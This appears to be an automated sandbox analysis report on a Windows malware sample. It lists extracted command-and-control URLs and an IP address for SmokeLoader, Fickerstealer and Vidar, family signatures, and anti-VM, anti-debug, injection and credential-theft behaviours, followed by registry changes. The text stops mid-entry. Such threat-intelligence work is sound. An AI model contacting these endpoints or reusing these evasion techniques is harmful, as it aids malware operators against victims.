Analysis
-
max time kernel
95s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-07-2021 04:02
Static task
static1
Behavioral task
behavioral1
Sample
88A990A868EADA802839185B6F05C541.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
88A990A868EADA802839185B6F05C541.exe
Resource
win10v20210408
General
-
Target
88A990A868EADA802839185B6F05C541.exe
-
Size
3.2MB
-
MD5
88a990a868eada802839185b6f05c541
-
SHA1
499be12d4fe4f30e672601b1ccbfc4f014a8bca8
-
SHA256
474a473bf46fdbfb5a9344937674c1455d764e74c2cd8892da7d59f68ffadd5c
-
SHA512
7bd11e52a079da6584669707617a433a9f233a7300057d4751872ab202dc665b9c8429df7a641951ef04f51af74fe09e5ac6be49aa7fe2aedb235409e0243cad
Malware Config
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
fickerstealer
37.0.8.225:80
Extracted
vidar
39.6
865
https://sslamlssa1.tumblr.com/
-
profile_id
865
Extracted
vidar
39.6
903
https://sslamlssa1.tumblr.com/
-
profile_id
903
Extracted
metasploit
windows/single_exec
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral2/memory/1464-527-0x00000000014A0000-0x0000000001DC6000-memory.dmp family_glupteba behavioral2/memory/1464-529-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4496 3384 rUNdlL32.eXe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5396 3384 rUNdlL32.eXe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4564 3384 rUNdlL32.eXe 45 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6648 3384 rUNdlL32.eXe 45 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral2/files/0x000100000001abf2-366.dat family_redline behavioral2/files/0x000100000001abf2-365.dat family_redline behavioral2/memory/6044-444-0x0000000000417E26-mapping.dmp family_redline behavioral2/memory/6064-445-0x0000000000417E1E-mapping.dmp family_redline behavioral2/memory/4296-489-0x0000000000417E22-mapping.dmp family_redline behavioral2/memory/4296-500-0x0000000004E00000-0x0000000005406000-memory.dmp family_redline behavioral2/memory/4904-517-0x0000000000417DEE-mapping.dmp family_redline behavioral2/memory/5920-525-0x0000000000417DEA-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000100000001ab2f-144.dat family_socelars behavioral2/files/0x000100000001ab2f-143.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/5804-472-0x0000000002680000-0x000000000271D000-memory.dmp family_vidar behavioral2/memory/5488-485-0x000000000046B76D-mapping.dmp family_vidar behavioral2/memory/5804-478-0x0000000000400000-0x00000000009F0000-memory.dmp family_vidar behavioral2/memory/5488-499-0x0000000000400000-0x00000000004A1000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 36 IoCs
pid Process 3200 Files.exe 1148 File.exe 1908 Folder.exe 3140 KRSetp.exe 3920 Info.exe 4152 jg3_3uag.exe 4240 Folder.exe 4200 Install.exe 4304 pub2.exe 5056 biaefvj 5196 LNXz4peJ_8ZzfRBexFSZCeeA.exe 5204 Mnr__Rr2OKzsxfOBINPifWt4.exe 5184 nKfknZKhwp5nxxbZvhxI66_E.exe 5168 vfO6gwyWSeGrYGgCMvVCzYNj.exe 5176 C_ApEiCLnEiR_RLejH6vF1Mv.exe 5236 4gVRAMZibFMa2cjSSUDELd7Q.exe 5264 cmF0KfcxRZsKpz_jGg9BNZbS.exe 5340 txwju7KqHciQvUjVbPKUeEkl.exe 5412 iwxWWGVxR3Uowz3HZszRjroq.exe 5520 5D73.exe 5700 6mq72uEDlO8PvAyx8SsxRD7D.exe 5784 TZWAYtMVnr7WtnJ3GhcUDLxp.exe 5804 UrN6lb3a_OKPUuxjic9qNDU6.exe 5828 XO8LPI42kK5rFGIX30qEmIJm.exe 5872 rteEoHmAeIECR3WOOBfQi8TF.exe 5900 vcwFgU6ktFApk5A8Q2tvcvlA.exe 5964 PING.EXE 6108 wc5C0EUt5fcejaA3jOnxOeYi.exe 6136 NkQMFCgtR5NPdWS_ZbJfCPpp.exe 1464 woxBH7Nr6giQWt9wnhy33pk6.exe 4928 0evkxxGDpJ9t_tofxo4TSlGo.exe 6072 C_ApEiCLnEiR_RLejH6vF1Mv.exe 6044 LNXz4peJ_8ZzfRBexFSZCeeA.exe 6064 4gVRAMZibFMa2cjSSUDELd7Q.exe 4016 C_ApEiCLnEiR_RLejH6vF1Mv.exe 5548 5D73.exe -
resource yara_rule behavioral2/files/0x000100000001ab2e-136.dat vmprotect behavioral2/files/0x000100000001ab2e-137.dat vmprotect behavioral2/memory/4152-142-0x0000000000400000-0x00000000005DB000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0evkxxGDpJ9t_tofxo4TSlGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0evkxxGDpJ9t_tofxo4TSlGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rteEoHmAeIECR3WOOBfQi8TF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rteEoHmAeIECR3WOOBfQi8TF.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation 88A990A868EADA802839185B6F05C541.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Files.exe -
Loads dropped DLL 2 IoCs
pid Process 4532 rundll32.exe 4304 pub2.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4624 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000100000001ac10-415.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rteEoHmAeIECR3WOOBfQi8TF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0evkxxGDpJ9t_tofxo4TSlGo.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ipinfo.io 20 ipinfo.io 63 ip-api.com 185 api.2ip.ua 187 api.2ip.ua 218 ipinfo.io 189 api.ipify.org 219 ipinfo.io 283 ipinfo.io -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent A2B00CC4F2A6A725 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 5872 rteEoHmAeIECR3WOOBfQi8TF.exe 4928 0evkxxGDpJ9t_tofxo4TSlGo.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1104 set thread context of 4668 1104 svchost.exe 94 PID 5196 set thread context of 6044 5196 LNXz4peJ_8ZzfRBexFSZCeeA.exe 132 PID 5236 set thread context of 6064 5236 4gVRAMZibFMa2cjSSUDELd7Q.exe 134 PID 5520 set thread context of 5548 5520 5D73.exe 143 PID 5204 set thread context of 5488 5204 Mnr__Rr2OKzsxfOBINPifWt4.exe 149 -
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000200000001ab32-122.dat autoit_exe behavioral2/files/0x000200000001ab32-123.dat autoit_exe -
Drops file in Program Files directory 7 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Toner-Recover.exe nKfknZKhwp5nxxbZvhxI66_E.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj.reg nKfknZKhwp5nxxbZvhxI66_E.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\adj2.reg nKfknZKhwp5nxxbZvhxI66_E.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat nKfknZKhwp5nxxbZvhxI66_E.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe nKfknZKhwp5nxxbZvhxI66_E.exe File opened for modification C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.exe nKfknZKhwp5nxxbZvhxI66_E.exe File created C:\Program Files (x86)\EverestSoftrade\TonerRecover\Uninstall.ini nKfknZKhwp5nxxbZvhxI66_E.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 5976 5056 WerFault.exe 106 6004 5828 WerFault.exe 126 5040 5828 WerFault.exe 126 1780 5828 WerFault.exe 126 4492 5828 WerFault.exe 126 5156 5828 WerFault.exe 126 2716 1464 WerFault.exe 139 7916 6060 WerFault.exe 252 8092 6060 WerFault.exe 252 7668 6060 WerFault.exe 252 4520 6060 WerFault.exe 252 6996 7752 WerFault.exe 277 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6468 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4240 taskkill.exe 7048 taskkill.exe 7280 taskkill.exe 8144 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b0f5486b2c7dd701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74WP1CM3-506M-V62R-WR42-7MQP227Y2YLP} rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = acc11d6e2c7dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ} svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}\1 = "4980" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\7289246C77593EBF\2 = "1" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 